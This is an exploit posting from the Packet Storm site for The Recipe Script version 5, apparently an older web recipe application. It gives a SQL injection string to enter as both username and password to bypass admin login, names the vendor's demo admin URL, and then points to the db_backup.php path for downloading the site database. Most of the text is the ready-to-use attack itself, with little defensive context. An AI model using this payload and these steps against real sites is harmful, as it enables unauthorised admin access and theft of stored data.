The Recipe Script version 5 suffers from a remote SQL injection vulnerability that allows for authentication bypass. It also suffers from an arbitrary database backup vulnerability.
85331df95f4cabd6b313193841ab64c211c2a52a4a8a28fa4e4b47019f4cd71a-----------------------------------------------------
The Recipe Script version 5 (Auth Bypass) Remote Sql Injecion/ Database Backup Exploit
-----------------------------------------------------
Founder: TiGeR-Dz
script:The Recipe Script version 5
downlaod:http://recipescript.com/
-----------------------------------------------------------
-----------------------------------------------------------
(Auth Bypass) Remote Sql Injecion
--------------------------------
username: ' or '1=1
Password: ' or '1=1
demo:
-----
http://recipescript.com/demo/admin/index.php
------------------------------------------------------
Database Backup Exploit:
-------------------------
After login to administration panel to get Backup
http://recipescript.com/demo/admin/db_backup.php
--------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed